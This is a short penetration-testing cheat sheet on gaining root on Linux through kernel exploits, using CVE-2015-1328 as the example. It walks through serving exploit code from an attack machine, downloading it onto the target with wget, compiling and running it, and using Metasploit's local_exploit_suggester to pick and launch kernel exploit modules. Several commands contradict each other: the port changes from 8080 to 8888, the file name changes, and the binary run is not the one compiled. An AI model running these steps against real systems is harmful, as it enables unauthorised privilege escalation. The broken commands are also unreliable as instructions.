Kernel vulnerability exploits

Become root on Linux via kernel exploit:

  1. Identify the kernel version

  2. Detect vulnerabilities

  3. Develop or acquire exploit code

  4. Transfer the exploit to the target machine

  5. Execute the exploit on the target

Example: CVE-2015-1328

For CVE-2015-1328 exploit-db lists several possible exploits:

Using 37292

  1. Create a local file 37292.c in the /tmp/ directory and paste the code in the file

  2. Start a local python http server: python -m http.server 8080

  3. From the target machine: wget http://<IP address attack machine>:8888/37292.c

  4. Compile on target machine: gcc CVE-2015-1328.c -o 37292

  5. Make executable: chmod +x 37292

  6. Check current user: id

  7. Run the compiled exploit: ./exp

  8. Check current user: id

Using 40688

  1. Upgrade existing shell (meterpreter, ssh, or a basic command shell) to meterpreter session

Open a new meterpreter session with:

sessions -u <number>

Or upgrade the most recently opened session to meterpreter:

sessions -u -1
  1. Load the local_exploit_suggester module in msfconsole:

meterpreter> use post/multi/recon/local_exploit_suggester
  1. Set the SESSION option for the module to the session ID of the meterpreter session, and run

  2. Test the exploit modules recommended by local_exploit_suggester. The first few modules in the output usually have a higher chance of working successfully.

  3. Load a module, set the module options and exploit

  4. An exploit can fail for many reasons. If not works, try the next one or install missing components for it to run.


A failed kernel exploit can lead to a system crash. Make sure this potential outcome is acceptable within the scope of the penetration testing engagement before attempting a kernel exploit.

You can transfer the exploit code from your machine to the target system using the SimpleHTTPServer Python module and wget respectively.